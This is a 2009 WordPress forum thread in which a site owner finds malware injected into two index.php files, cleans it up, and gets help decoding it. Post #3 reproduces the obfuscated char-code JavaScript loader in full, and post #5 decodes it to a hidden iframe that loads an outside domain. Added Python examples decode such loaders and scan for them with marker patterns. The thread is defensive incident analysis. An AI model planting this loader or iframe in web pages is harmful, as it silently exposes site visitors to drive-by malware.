Wordpress Themes - WP Forum at BFA
There will be no more development for Atahualpa (or any other theme), and no support. Also no new registrations. I turned off the donation system. I may turn the forum to read only if it gets abused for spam. Unfortunately I have no time for the forum or the themes. Thanks a lot to the people who helped in all these years, especially Larry and of course: Paul. Take care and stay healthy -- Flynn, Atahualpa developer, Sep 2021


Malware on my site


  #1  
Old May 21, 2009, 09:53 PM
scrubbs
 
22 posts · Apr 2009
site is http://www.inspirationalparenting.com

Yesterday, I started getting warnings of a virus/malware on my site. It is called Bloodhound.Exploit.213 and Bloodhound.Exploit.196.

Has anyone experienced this? My host (godaddy) is giving me the runaround. Any ideas on what I can do?

I recently updated the plugin Add to any: but not sure how that could impact.

It seems to happen most when I access the site admin dashboard, but outside users have notified me as well.

Help!!!
  #2  
Old May 22, 2009, 07:50 AM
Flynn
 
3,768 posts · Oct 2008
Munich, Germany
Perhaps this helps http://wordpress.org/support/topic/242327
  #3  
Old May 22, 2009, 10:29 AM
scrubbs
 
22 posts · Apr 2009
Apparently my site got hacked (according to godaddy). I am trying to avoid paying them a large fee to restore it all from their backup.

I do have a backup but it is only of the content in the database and not the entire site. I may have to start over and rebuild the entire thing which represents weeks of work...

I may have found the file they modified. Can you help me with something?

What should the file index.php in the wp-content folder look like?

Mine has the following in it...

<?php
// Silence is golden.
?><?php echo '<script type="text/javascript">
var cOTtEtyFSFfjldSGegJo = "lAOY60lAOY105lAOY102lAOY114lAOY97lAOY109lAOY101lAOY32lAOY119lAOY105lAOY100lAOY116lAOY104lAOY61lAOY34lAOY52lAOY56lAOY48lAOY34lAOY32lAOY104lAOY101lAOY105lAOY103lAOY104lAOY116lAOY61lAOY34lAOY54lAOY48lAOY34lAOY32lAOY115lAOY114lAOY99lAOY61lAOY34lAOY104lAOY116lAOY116lAOY112lAOY58lAOY47lAOY47lAOY116lAOY114lAOY97lAOY102lAOY102lAOY105lAOY99lAOY115lAOY45lAOY105lAOY110lAOY115lAOY112lAOY101lAOY99lAOY116lAOY111lAOY114lAOY46lAOY99lAOY110lAOY47lAOY100lAOY97lAOY105lAOY108lAOY121lAOY95lAOY115lAOY116lAOY97lAOY116lAOY115lAOY47lAOY105lAOY110lAOY46lAOY99lAOY103lAOY105lAOY63lAOY52lAOY34lAOY32lAOY115lAOY116lAOY121lAOY108lAOY101lAOY61lAOY34lAOY98lAOY111lAOY114lAOY100lAOY101lAOY114lAOY58lAOY48lAOY112lAOY120lAOY59lAOY32lAOY112lAOY111lAOY115lAOY105lAOY116lAOY105lAOY111lAOY110lAOY58lAOY114lAOY101lAOY108lAOY97lAOY116lAOY105lAOY118lAOY101lAOY59lAOY32lAOY116lAOY111lAOY112lAOY58lAOY48lAOY112lAOY120lAOY59lAOY32lAOY108lAOY101lAOY102lAOY116lAOY58lAOY45lAOY53lAOY48lAOY48lAOY112lAOY120lAOY59lAOY32lAOY111lAOY112lAOY97lAOY99lAOY105lAOY116lAOY121lAOY58lAOY48lAOY59lAOY32lAOY102lAOY105lAOY108lAOY116lAOY101lAOY114lAOY58lAOY112lAOY114lAOY111lAOY103lAOY105lAOY100lAOY58lAOY68lAOY88lAOY73lAOY109lAOY97lAOY103lAOY101lAOY84lAOY114lAOY97lAOY110lAOY115lAOY102lAOY111lAOY114lAOY109lAOY46lAOY77lAOY105lAOY99lAOY114lAOY111lAOY115lAOY111lAOY102lAOY116lAOY46lAOY65lAOY108lAOY112lAOY104lAOY97lAOY40lAOY111lAOY112lAOY97lAOY99lAOY105lAOY116lAOY121lAOY61lAOY48lAOY41lAOY59lAOY32lAOY45lAOY109lAOY111lAOY122lAOY45lAOY111lAOY112lAOY97lAOY99lAOY105lAOY116lAOY121lAOY58lAOY48lAOY34lAOY62lAOY60lAOY47lAOY105lAOY102lAOY114lAOY97lAOY109lAOY101lAOY62";
var aRaKwtvZBKReZlYeeWkx = cOTtEtyFSFfjldSGegJo.split("lAOY");
var cPgNszUXgdMGvmQsgMRi = "";
for (var XjMxUkbzHLxjaexTdRrJ=1; XjMxUkbzHLxjaexTdRrJ<aRaKwtvZBKReZlYeeWkx.length; XjMxUkbzHLxjaexTdRrJ++){cPgNszUXgdMGvmQsgMRi+=String.fromCharCode(aRaKwtvZBKReZlYeeWkx[XjMxUkbzHLxjaexTdRrJ]);}
var BvcYOhYUIDCJXNobcdEr = ""+cPgNszUXgdMGvmQsgMRi+"";
document.write(""+BvcYOhYUIDCJXNobcdEr+"")
</script>'; ?>


Perhaps this is what the hacker modified?
  #4  
Old May 22, 2009, 11:06 AM
scrubbs
 
22 posts · Apr 2009
I think I may have been able to clean it out. I found the above-mentioned script in two index.php files (wp-content and wp-admin). I forgot I had downloaded my site to my computer, so I compared those files to what I had downloaded and then confirmed that script is bad.

I went through the entire site with FTP and only found those two files had been updated on the day this happened so hopefully I cleaned it out and can avoid paying for an entire restore!
  #5  
Old May 22, 2009, 11:58 AM
juggledad
 
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
So this puzzled me and I decided to 'decode' the script. When it does the document.write, what it's writing is the following
-------
<iframe width="480" height="60" src="http://traffics-inspector.cn/daily_stats/in.cgi?4" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>
--------
for what it's worth

Last edited by juggledad; May 22, 2009 at 05:42 PM.
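The decoding juggledad did by hand can be done without ever running the script. The following is an added example (not code from the thread or from the Atahualpa project): it takes the delimiter from the `.split("...")` call, maps each numeric field back through the same char-code rule that `String.fromCharCode` applies, and then lists the traits that make the resulting iframe invisible to visitors (opacity 0, off-screen offset). The embedded sample is constructed in the same shape as the injected script; its host is a reserved `.invalid` placeholder, not the real one.

```python
import re

# Constructed sample in the shape of the injected loader: a junk token
# separates decimal char codes, a loop rebuilds the string with
# String.fromCharCode, and document.write emits it. The host below is a
# placeholder (.invalid is reserved), not the domain from the thread.
_DELIM = "lAOY"
_HIDDEN_IFRAME = ('<iframe width="480" height="60" '
                  'src="http://malware.example.invalid/in.cgi?4" '
                  'style="position:relative;left:-500px;opacity:0"></iframe>')
SAMPLE_SCRIPT = (
    '<script type="text/javascript">var a = "'
    + "".join(_DELIM + str(ord(ch)) for ch in _HIDDEN_IFRAME)
    + '";var b = a.split("' + _DELIM + '");var c = "";'
    'for (var i=1; i<b.length; i++){c+=String.fromCharCode(b[i]);}'
    'document.write(c)</script>'
)


def decode_charcode_script(script: str) -> str:
    """Recover the string a split()/fromCharCode loader would write.

    Works for any script of this family regardless of the junk token or
    variable names: the delimiter is read from the .split("...") call, the
    first quoted blob made of <delim><digits> fields is located, and each
    field is turned back into its character. Nothing is executed.
    """
    m = re.search(r'\.split\("([^"]+)"\)', script)
    if not m:
        raise ValueError('no .split("delim") call found')
    delim = m.group(1)
    blob = re.search(r'"((?:' + re.escape(delim) + r'\d+)+)"', script)
    if not blob:
        raise ValueError("no encoded blob using that delimiter")
    fields = blob.group(1).split(delim)
    # field 0 is empty because the blob starts with the delimiter; the
    # original loop skips it too (it starts at index 1)
    return "".join(chr(int(f)) for f in fields if f)


def hidden_iframe_indicators(html: str) -> list:
    """Return the traits that hide an injected iframe from the visitor."""
    found = []
    for tag in re.finditer(r'<iframe\b[^>]*>', html, re.I):
        attrs = tag.group(0)
        style = re.search(r'style="([^"]*)"', attrs)
        style = style.group(1).replace(" ", "").lower() if style else ""
        if "opacity:0" in style:
            found.append("opacity:0")
        if re.search(r'left:-\d+px', style):
            found.append("off-screen offset")
        src = re.search(r'src="([^"]*)"', attrs)
        if src:
            found.append("src=" + src.group(1))
    return found


if __name__ == "__main__":
    decoded = decode_charcode_script(SAMPLE_SCRIPT)
    print(decoded)
    print(hidden_iframe_indicators(decoded))
```

Decoding statically rather than pasting the script into a browser matters because the decoded `src` is the indicator worth recording and blocking; the loader itself is just an envelope that changes its variable names and delimiter from one infection to the next.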
  #6  
Old May 26, 2009, 11:30 AM
owenl
 
44 posts · Jan 2009
Suggest that everyone get the Exploit Scanner WP plugin and run it every couple of weeks - it watches all your WP and theme files for this kind of attack (usually SQL injection - they try to get it to work by placing PHP code embedded in comments that gets run automatically).

Anyway - the two best defences are to update WordPress ALWAYS asap - and to use this plugin. It scans all your files and lists everything that might be an attack so you can compare the files.

One disadvantage - it flags itself a lot (since it uses small sections of examples as to what is bad) and it flags a lot of JavaScript user interface files that are needed by real plugins.

I run it after installing on a setup that I know is clean and note all the OK things it flags and then watch for things that are different.
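Two things in this thread are worth automating: scrubbs' cleanup in #4 (comparing the live files against a known-clean download and looking for what changed) and owenl's way of using a scanner (record the hits on a clean install as a baseline, then only act on new ones). The script below is an added example, not the Exploit Scanner plugin's code or anything from the Atahualpa project. It hashes both trees, reports added and modified files, scans for the loader markers visible in this thread plus a check that a placeholder index.php contains nothing beyond "Silence is golden", and subtracts a baseline of accepted hits. The WordPress file layout and the injected payload are constructed fixtures in a temporary directory; the marker list is illustrative, not the plugin's.

```python
import hashlib
import os
import re
import tempfile

# Markers typical of injected loaders (names are ours). Legitimate JS UI
# files match some of these too, hence the baseline mechanism below.
MARKERS = [
    ("fromCharCode loader", re.compile(rb"String\.fromCharCode")),
    ("document.write", re.compile(rb"document\.write\(")),
    ("script tag in file", re.compile(rb"<script[^>]*>", re.I)),
    ("eval(base64_decode", re.compile(rb"eval\s*\(\s*base64_decode", re.I)),
]
# Stock content of the placeholder index.php files WordPress ships
SILENCE = b"<?php\n// Silence is golden.\n?>"
# Constructed stand-in for the injected loader; the real one is an
# obfuscated document.write of a hidden iframe
PAYLOAD = (b"<?php echo '<script type=\"text/javascript\">"
           b"document.write(String.fromCharCode(60));</script>'; ?>")


def sha256_tree(root):
    """Map relative path -> SHA-256 of content for every file under root."""
    out = {}
    for d, _, files in os.walk(root):
        for f in files:
            p = os.path.join(d, f)
            with open(p, "rb") as fh:
                out[os.path.relpath(p, root)] = hashlib.sha256(fh.read()).hexdigest()
    return out


def diff_trees(clean, live):
    """Files present only in live, and files whose content differs."""
    a, b = sha256_tree(clean), sha256_tree(live)
    return {"added": sorted(set(b) - set(a)),
            "modified": sorted(k for k in a if k in b and a[k] != b[k])}


def scan_markers(root):
    """Sorted (relpath, marker name) pairs for every file under root."""
    hits = []
    for rel in sha256_tree(root):
        with open(os.path.join(root, rel), "rb") as fh:
            data = fh.read().strip()
        # a placeholder index.php should be exactly the stock stub
        if rel.endswith("index.php") and data.startswith(b"<?php\n// Silence is golden.") and data != SILENCE:
            hits.append((rel, "placeholder index.php has extra code"))
        for name, rx in MARKERS:
            if rx.search(data):
                hits.append((rel, name))
    return sorted(hits)


def report(clean, live, baseline=()):
    """Changes since the clean copy plus marker hits not already accepted."""
    changes = diff_trees(clean, live)
    accepted = set(baseline)
    return {"added": changes["added"], "modified": changes["modified"],
            "new_hits": [h for h in scan_markers(live) if h not in accepted]}


def build_demo():
    """Constructed fixture: a clean copy and a live copy where the same two
    index.php files the thread describes carry the payload."""
    root = tempfile.mkdtemp()
    clean, live = os.path.join(root, "clean"), os.path.join(root, "live")
    admin = b"<?php require_once('admin.php'); ?>"
    files = {  # rel path: (clean content, live content)
        "wp-content/index.php": (SILENCE, SILENCE + PAYLOAD),
        "wp-admin/index.php": (admin, admin + PAYLOAD),
        "wp-includes/js/ui.js": (b"document.write('<div>');",) * 2,  # legit, noisy
    }
    for rel, (c, l) in files.items():
        for base, content in ((clean, c), (live, l)):
            p = os.path.join(base, rel)
            os.makedirs(os.path.dirname(p), exist_ok=True)
            with open(p, "wb") as fh:
                fh.write(content)
    return clean, live


if __name__ == "__main__":
    clean_dir, live_dir = build_demo()
    baseline_hits = scan_markers(clean_dir)  # owenl's "note the OK things"
    print(report(clean_dir, live_dir, baseline_hits))
```

Hashing the trees is the stronger half of this: it does not depend on FTP modification dates, which an intruder can reset, and it catches files that a marker list has no pattern for. The marker scan is what you fall back on when no clean copy exists, and the baseline keeps the known-noisy UI scripts from drowning the real findings.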
  #7  
Old May 26, 2009, 02:01 PM
juggledad
 
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
Just tried to install Exploit Scanner - looks like it doesn't work with WP 2.7.1; there is a post on the WordPress forums that it hasn't worked since WP 2.6.3.
